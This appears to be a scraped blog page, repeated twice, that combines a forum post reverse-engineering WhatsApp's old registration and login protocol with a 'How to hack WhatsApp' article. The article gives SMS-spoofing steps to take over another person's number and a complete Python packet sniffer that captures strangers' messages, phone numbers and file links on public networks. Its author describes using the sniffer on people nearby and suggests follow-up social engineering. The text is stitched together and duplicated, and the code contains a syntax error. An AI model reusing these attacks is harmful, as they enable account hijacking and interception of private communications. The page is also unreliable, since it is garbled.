When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>
The Answer after calling the API is an xml saying:
Code:
<code><response status="sucess-sent" result="30"></code>
What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^
Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:
Code:
WhatsApp code abc
abc is the necessary Code
2) With the given code you can then register your Whatsapp-Account
API-Call:
Code:
https://r.whatsapp.n...d=asdf&code=abc
cc/in = the same as in code.php
udid = the calculated password as explained in the login-data
code = the just recieved WhatsApp-Code
The XML response looks like:
Code:
<register> <response status="ok" login="4917612345" result="new" /> </register>
The login-value is your login-Name for the connection and built like explained.
I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^
3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.
API-call:
Code:
https://r.whatsapp.n...12345&udid=asdf
Parameters are the same like above.
Resonse when account with this number and pw exists:
Code:
<exist><response status="ok" result="4917612345" /></exist>
The result again gives the login-name for this account.
I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)
The last thing I searced for before studing for my exams was the server connection.
It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.
I think there are some small differences between the default XAMPP and the way WhatsApp does it.
But nevertheless the URL I found to where it tries to connect is:
Code:
socket://bin-short.whatsapp.net:5222
When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.
When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.
WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.
The Login-Process in the WhatsApp-Code looks like:
Code:
out.streamStart(connection.domain, connection.resource);
System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();
Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:
Code:
send1();
send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();
-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.
Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.
Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU
Thats all I did up to now (or more exactly before my exams).
I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all
If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view
PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now
I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )
and then I found this :
How to hack WhatsApp Messenger on Nokia, iPhone & Android
shareshareshareshare
WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.
In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.
Hack 1
Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
Hack 2
The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code
You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.
I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)
I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:
The first thing is the login-Name and the password needed to login:
Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:
international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net
For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.
The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.
I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)
The second thing I searched for is the registration process.
With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly
The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)
0) All these API-Request are done with an User-Agent like:
Code:
WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00
The Code generating this is: http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.
1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)
The API-call looks like this:
Code:
https://r.whatsapp.n...0000&method=sms
The Arguments are as following:
cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)
The metod is maybe the most interesting thing.
There are 3 methods: self, sms and voice
When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>
The Answer after calling the API is an xml saying:
Code:
<code><response status="sucess-sent" result="30"></code>
What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^
Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:
Code:
WhatsApp code abc
abc is the necessary Code
2) With the given code you can then register your Whatsapp-Account
API-Call:
Code:
https://r.whatsapp.n...d=asdf&code=abc
cc/in = the same as in code.php
udid = the calculated password as explained in the login-data
code = the just recieved WhatsApp-Code
The XML response looks like:
Code:
<register> <response status="ok" login="4917612345" result="new" /> </register>
The login-value is your login-Name for the connection and built like explained.
I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^
3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.
API-call:
Code:
https://r.whatsapp.n...12345&udid=asdf
Parameters are the same like above.
Resonse when account with this number and pw exists:
Code:
<exist><response status="ok" result="4917612345" /></exist>
The result again gives the login-name for this account.
I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)
The last thing I searced for before studing for my exams was the server connection.
It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.
I think there are some small differences between the default XAMPP and the way WhatsApp does it.
But nevertheless the URL I found to where it tries to connect is:
Code:
socket://bin-short.whatsapp.net:5222
When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.
When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.
WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.
The Login-Process in the WhatsApp-Code looks like:
Code:
out.streamStart(connection.domain, connection.resource);
System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();
Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:
Code:
send1();
send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();
-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.
Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.
Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU
Thats all I did up to now (or more exactly before my exams).
I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all
If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view
PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now
I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )
and then I found this :
How to hack WhatsApp Messenger on Nokia, iPhone & Android
shareshareshareshare
WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.
In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.
Hack 1
Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
Hack 2
The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code
You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
Read More »
Labels:
Whatsapp tricks
Subscribe to:
Posts (Atom)
![How To Hack Whatsapp [Tutorial] - Whatsapp Sniffing App](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_slwvSJ99s2Uwp7CaJF0D3iFRdfKzDBt1GUOhhDYcmSYaQTa-P7_b-IkoSsIuYynCUNeguWqeGXYRlC-uiNNfGaH6x-6iojjINyMdVXCYrEb0g)
![WHATSAPP HACK - SPY TOOL - With PROOF! [FEBRUARY 2013] NO SURVEYS](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vT1BphXjxq5wscdo6KGROZmQHoB3o2uh9q2b6p3S0U8hojl31AfRFntiGJx750pT97v9iMA78pr8AbhbPXqQy5B4ah1FvNjITj1VVJX2_1UBo)
